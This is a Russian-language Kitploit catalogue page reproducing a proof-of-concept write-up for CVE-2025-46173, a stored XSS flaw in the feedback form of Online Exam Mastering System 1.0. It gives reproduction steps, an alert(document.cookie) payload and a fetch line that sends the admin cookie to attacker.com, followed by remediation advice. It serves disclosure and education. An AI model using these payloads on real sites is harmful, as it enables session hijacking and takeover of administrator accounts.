Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-46173 — poc для CVE-2025-46173 | Kitploit
Инструменты/GitHubGitHub/pruthuraut/cve-2025-46173
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

poc для CVE-2025-46173

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-46173 - Межсайтовый скриптинг (XSS) с сохранением в Online Exam Mastering System 1.0

📌 Краткое описание

CVE-2025-46173 — это уязвимость межсайтового скриптинга с сохранением (XSS), обнаруженная в Online Exam Mastering System 1.0 от code-projects. Уязвимость присутствует в компоненте feedback.php, где ввод пользователя в поле имени недостаточно очищается, что позволяет злоумышленнику внедрить произвольный JavaScript. Когда администратор просматривает этот отзыв в панели управления (dash.php), нагрузка выполняется в браузере администратора, что приводит к перехвату сессии и потенциальному повышению привилегий.


🧠 Детали уязвимости

  • Тип уязвимости: Межсайтовый скриптинг с сохранением (XSS)
  • Идентификатор CVE: CVE-2025-46173
  • Вендор: code-projects
  • Продукт: Online Exam Mastering System
  • Затронутая версия: 1.0
  • Компонент: feedback.php,
Скачать инструмент
dash.php
  • Вектор атаки: Удаленный
  • Влияние: Повышение привилегий, перехват сессии

  • 📷 Подтверждение концепции

    1. Внедрение

    Пользователь отправляет следующую нагрузку в поле Имя в форме обратной связи:

    root@kitploit:~
    <script>alert(document.cookie)</script>
    

    Payload in Feedback Form

    2. Запуск

    Когда администратор позже просматривает отправленный отзыв в dash.php, нагрузка выполняется:

    Admin Trigger XSS

    3. Результат

    Сессионный cookie администратора становится доступным через document.cookie, который может быть извлечен:

    root@kitploit:~
    <script>
      fetch("http://attacker.com/steal?cookie=" + document.cookie);
    </script>
    

    ⚙️ Шаги для воспроизведения

    1. Клонируйте или настройте уязвимую версию с code-projects.

    2. Перейдите по адресу localhost/exam/feedback.php.

    3. Заполните поле "Имя" следующим:

      root@kitploit:~
      <script>alert(document.cookie)</script>
      
    4. Отправьте форму.

    5. Войдите как администратор и перейдите на dash.php?q=3, чтобы просмотреть отзывы.

    6. Скрипт выполнится в контексте администратора.


    🔥 Влияние

    • Похищение сессионных cookie администратора
    • Выдача себя за администратора
    • Получение полного административного доступа
    • Изменение или удаление тестовых данных
    • Повышение привилегий

    🔒 Рекомендуемые меры по устранению

    • Очищайте пользовательский ввод, экранируя специальные HTML-символы (например, &, <, >, ").
    • Используйте надежную библиотеку очистки, такую как htmlspecialchars() в PHP, или комбинацию проверки на фронтенде и очистки на бэкенде.
    • Внедрите политику безопасности контента (CSP).
    • Рассмотрите возможность кодирования данных перед отображением в DOM.

    🔗 Ссылки

    • Слепой межсайтовый скриптинг (Invicti)
    • Acunetix - Обнаружение слепого XSS
    • Шпаргалка OWASP по предотвращению XSS

    👤 Обнаружитель

    Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub


    Скриншоты предназначены только для образовательных целей. Все тестирование проводилось в локальной среде.

    🎥 Видео PoC

    Нажмите здесь, чтобы посмотреть демонстрационное видео


    ⚠️ Отказ от ответственности

    Эта информация предоставляется только в образовательных и исследовательских целях. Не используйте ее в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.